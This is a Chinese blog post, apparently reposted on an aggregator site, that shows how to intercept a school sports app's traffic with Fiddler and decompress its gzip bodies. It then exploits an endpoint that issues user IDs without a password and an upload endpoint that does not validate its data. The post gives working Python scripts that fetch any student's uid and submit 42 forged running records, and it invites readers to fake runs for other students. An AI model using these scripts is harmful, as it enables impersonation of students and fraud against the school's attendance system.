IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发测试 -> Fiddler抓包实战 -> 正文阅读

[开发测试]Fiddler抓包实战

Fiddler抓包

Fiddler是一个蛮好用的抓包工具,可以将网络传输发送与接受的数据包进行截获、重发、编辑、转存等操作,也能用于安卓抓包。
Fiddler有多种版本,我用的是Progress Telerik Fiddler Web Debugger,为了能抓手机的包,需要一些准备工作:比如自己的手机和电脑必须在同一个局域网内,我选择的解决办法是,手机和电脑统一连接校园网,这样就能保证手机可以用Fiddler作为代理了,相当于手机和服务器之间插入了第三者,Fiddler能监听到它们之间的一切通信。

那怎样设置呢?

首先,我们需要知道自己电脑的IP地址,你可以在命令行输入ipconfig来查看,或者在Fiddler能直接查看在这里插入图片描述
然后就是手机上的设置了,在这里插入图片描述
代理主机就是我的电脑的ip地址,而代理端口就是Fiddler启动时候占用的端口,具体哪个端口可以在Fiddler:tool→options→connections中查看,没有修改过的话默认是8888。这时你就能抓到手机上的http包了,如果还想要抓到https的包,那就需要手机上安装证书了,证书下载方式:手机浏览器输入以下地址:电脑ip:8888,
在这里插入图片描述
手机下载安装即可。
好了,现在可以抓到http包了,现在就打开学校体育软件,看看它都做了什么事吧。
Fiddler已经抓了很多包了,ctrl+x清空全部,瞬间干净许多。


我现在想要的是在上传我的跑步记录时候做了哪些事情,先要有一段跑步记录,所以还是得小跑一段,不过要是你实在不愿意出门,可以下载一款定位模拟软件。

从打开到软件到我上传记录捕获的包如下所示:请添加图片描述
开心,很清晰就找到我们要的接口/Api/webserver/uploadRunData,但是要分析这个http包还有点困难,如图所示,出现乱码,但是响应消息很清晰:一个json字符串,m=707486,r=1,请记住这个格式的数据。
所以现在又有一个难题摆在面前,虽然接口和请求头我们看的明白,但是发过去的数据我们看不了。
但是可以看到Accept-Encoding是采用gzip压缩的,所以我们把这段乱码数据还原就有了思路。幸好我之前写过解压的代码:如下所示:

public static void main(String[] args) {
        byte[] arrOutput = { (byte) 0x1F, (byte) 0x8B, (byte) 0x08, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x0D, (byte) 0xC8, (byte) 0x31, (byte) 0x0E, (byte) 0xC3, (byte) 0x30, (byte) 0x08, (byte) 0x00, (byte) 0xC0, (byte) 0xCF, (byte) 0x54, (byte) 0x62, (byte) 0xA9, (byte) 0x25, (byte) 0x30, (byte) 0x18, (byte) 0x9B, (byte) 0xFE, (byte) 0x86 };
        System.out.println(new String(uncompress(arrOutput)));
    }

    public static byte[] uncompress(byte[] bytes) {
        if (bytes == null || bytes.length == 0) {
            return null;
        }
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ByteArrayInputStream in = new ByteArrayInputStream(bytes);
        try {
            GZIPInputStream ungzip = new GZIPInputStream(in);
            byte[] buffer = new byte[256];
            int n;
            while ((n = ungzip.read(buffer)) >= 0) {
                out.write(buffer, 0, n);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return out.toByteArray();
    }

arrOutput 变量是我在Fiddler切换到HexView查看方式下,复制得到的,如图:
在这里插入图片描述
但是粘贴也就是 0x1F,0x8B,直接黏贴上去,idea会报错,我们必须强转为byte类型,但是16进制数太多,一个个黏贴太麻烦,我就直接ctrl+r,替换0x为(byte) 0x,Replace all(小技巧)。
控制台查看我们得到的数据如下:

{'begintime':'1636199707','endtime':'1636200772','uid':'717d7480-28f6-4b1a-a58b-3830e1db41eb95ce1bf7ab934f6fba67100a06171cc01636129683$9ddfb400491530a73a7e273d4d9b6a43','schoolno':'xxxxx','distance':'3010.0','speed':'2.8289473684210527','studentno':'xxxxxxxxxxxxx','atttype':'3','eventno':'801','location':'','pointstatus':'1','usetime':'1064.0'}

这里schoolno和studentno就不展示了,还有location太长了,我就去掉了,但是不影响我们继续分析流程,location这个字段,在我后面研究过程中发现后端并没有做校验,它具体记录的值是我们某个时间点所处的位置。然后我只修改了begintime和endtime发现居然提交成功了,在学校体育管理界面查到两条数据,仅仅时间不同,距离和速度一模一样,Ohhhhhhhhhhh。
在这里插入图片描述
但是,这还不算完!!!!,你们看到后面就会发现学校体育后端的傻逼之处了
仔细看这些参数,begintime,endtime,schoolno,distance,speed,studentno,atttype,eventno,location,pointstatus,usetime还有uid。begintime,endtime,distance,speed,studentno,location,usetime我们都是可以伪造的,schoolno,atttype,eventno,pointstatus不变,猜测atttype,eventno,pointstatus三个参数是表示选择的跑步类型的参数,不用管,我们刷公里数只用校内定向跑。
最后还有一个参数uid,这是一个加密过的数据,每个用户只对应一个,上传的时候如果学号和uid对应不上,就会上传不成功。这里其实我们已经捕获到自己的uid了,那我要是拿到其他同学的uid,那我岂不是可以帮其他人跑了,我最喜欢助人为乐了,抱着这种想法,我就开始在捕获的数据包里一个一个查询uid请添加图片描述
但是,我在刚刚捕获的数据包里才看第一个,就已经发现了uid了。解压缩从控制台发现,这个请求体里就包含学号和姓名两个字段:请添加图片描述
注意,捕获这些数据包是从我进软件到上传数据的这一段时间的数据包,而uid出现在第一个包的请求体里,作为参数,那说明uid早就已经在手机上了,而我忽略了一个重要步骤:“登录”,所以我决定,退出登录,重新抓取数据。
请添加图片描述

name=%5B%27bangdingschool%27%2C%27xxxxx%27%2C%27xxxxxxxxxxxxx%27%2C%271ac959ab-249d-4479-9721-5fa2a4916b63%27%2C%27nubia%27%2C%27NX651J%27%2C%27android%27%2C%2711%27%5D

让我找到了返回uid的请求在这个包里,这个请求里,如图标红里一模一样,而其他参数有schoolno,studentno(我打码的两个),我的手机牌子nubia,手机型号NX651J,还有一个11,11在后面经过验证是不需要改动的。这里这麽多%xx可能不便于观察,那这样的呢?

name=['bangdingschool','xxxxx','xxxxxxxxxxxxx','32adcecb-79b9-4467-b5c0-c3d09b129467','nubia','NX651J','android','11']

响应体的内容:

success,http://xx.xx.xxx.xxx:8029/DragonFlyServ/,1ac959ab-249d-4479-9721-5fa2a4916b63c39708d2250749a5b9a64f5c775479dc1636278013$2962b0f01be157c24e50f76055c6d9d6,http://xx.xx.xxx.xx/app/index.php

总的来看,我没有用到密码,就从一个服务器里得到了uid,果然有漏洞。而现在我还需要知道32adcecb-79b9-4467-b5c0-c3d09b129467怎么弄到的呢?熟悉java的小伙伴肯定知道。这不就是 java.util.UUID.randomUUID().toString()随机生成的吗?


到这一步,我们已经完全把通信过程理解清楚了。接下来就是写自动跑步的代码了

第一步,先从java随机生成一个UUID

public class UUID {
    public static String getUUID(){
        return java.util.UUID.randomUUID().toString();
    }
    public static void main(String[] args) {
        System.out.println(getUUID());//236df500-4995-4f79-91f0-c119308abcd3
    }
}

得到UUID,放进http请求体里,

import requests
url = 'http://xxxxxxxxxx.cn:8012/cloud/DflyServer'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'Keep-Alive',
    'Charset': 'UTF-8',
    'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 11; NX651J Build/RKQ1.200826.002)',
    'Host': 'xxxxxxxxxx.cn:8012',
    'Accept-Encoding': 'gzip',
    'Content-Length': '168'
}

data = "name=['bangdingschool','xxxxx','xxxxxxxxxxxxx','236df500-4995-4f79-91f0-c119308abcd3','nubia','NX651J','android','11']"
res= requests.post(url,headers=headers,data=data)
print(res.text)
# success,http://xx.xx.xxx.xxx:8029/DragonFlyServ/,236df500-4995-4f79-91f0-c119308abcd395ce1bf7ab934f6fba67100a06171cc01636129683$9ddfb400491530a73a7e273d4d9b6a43,http://xx.xx.xxx.xx/app/index.php

有了uid,放进最开始分析的http请求里

import requests
import gzip
import json
from numpy import random

url = 'http://xx.xx.xxx.xxx:8029/DragonFlyServ/Api/webserver/uploadRunData'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'Keep-Alive',
    'Charset': 'UTF-8',
    'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 11; NX651J Build/RKQ1.200826.002)',
    'Host': 'xx.xx.xxx.xxx:8029',
    'Accept-Encoding': 'gzip',
    'Content-Length': '1963'
}
#一天相差的时间戳86400+-300
intervalTime = 0
begintime = 1631705429
for i in range(1,43):#1-43
    begintime = begintime+intervalTime
    usetime = random.randint(1064 - 30, 1064 + 30)  # 1064.0
    endtime = usetime + 1 + begintime
    distance = random.randint(2900, 3100)  # 3010.0
    speed = format(distance / usetime, '.16f')  # 2.8289473684210527
    intervalTime = random.randint(86400-300,86400+300)
    baseData = "{'begintime':'" + str(begintime) + "','endtime':'" + str(endtime) + "','uid':'236df500-4995-4f79-91f0-c119308abcd395ce1bf7ab934f6fba67100a06171cc01636129683$9ddfb400491530a73a7e273d4d9b6a43','schoolno':'xxxxx','distance':'" + format(distance,'.1f') + "','speed':'" + speed + "','studentno':'xxxxxxxxxxxxx','atttype':'3','eventno':'801','location':'','pointstatus':'1','usetime':'" + format(usetime,'.1f') + "'}"
    # print(baseData)
    data = gzip.compress(baseData.encode())
    res= requests.post(url,headers=headers,data=data)
    print(res.text)
    #这里打印的是{"r":"1","m":"708027"},不就是我前面要大家记住的json吗

在这里插入图片描述

  开发测试 最新文章
pytest系列——allure之生成测试报告(Wind
某大厂软件测试岗一面笔试题+二面问答题面试
iperf 学习笔记
关于Python中使用selenium八大定位方法
【软件测试】为什么提升不了?8年测试总结再
软件测试复习
PHP笔记-Smarty模板引擎的使用
C++Test使用入门
【Java】单元测试
Net core 3.x 获取客户端地址
上一篇文章      下一篇文章      查看所有文章
加:2021-11-11 13:00:20  更:2021-11-11 13:00:45 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/18 2:30:08-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码